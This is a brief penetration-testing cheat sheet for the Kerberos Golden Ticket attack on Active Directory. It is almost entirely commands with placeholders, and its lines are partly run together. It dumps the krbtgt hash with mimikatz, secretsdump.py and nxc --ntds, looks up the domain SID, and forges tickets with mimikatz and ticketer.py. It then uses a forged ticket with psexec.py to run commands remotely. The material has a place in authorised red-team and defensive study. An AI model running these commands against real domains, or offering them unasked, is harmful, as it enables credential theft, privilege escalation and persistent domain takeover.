Golden Ticket
NTLM Hash of krbtgt
.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgtsecretsdump.py <DOMAIN>/<USER_ADMIN>:'<PASS>'@<DC> | grep krbtgtlookupsid.py <DOMAIN>/<USER>:'<PASS>'@<DC> | grep -i "domain sid"nxc ldap <DC> -u '<USER>' -p <PASS> --get-sid
nxc smb <DC> -u '<USER_ADMIN>' -H <HASH> --ntdsAttack
kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<SID_DOMAIN> /krbtgt:<NTLM_KRBTGT> /id:500 /pttmisc::cmdticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> Administratorticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <NEW_USER>export KRB5CCNAME=<PATH_TO_FILE>.ccachepsexec.py <MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP> -dc-ip <DC> -k -no-passLast updated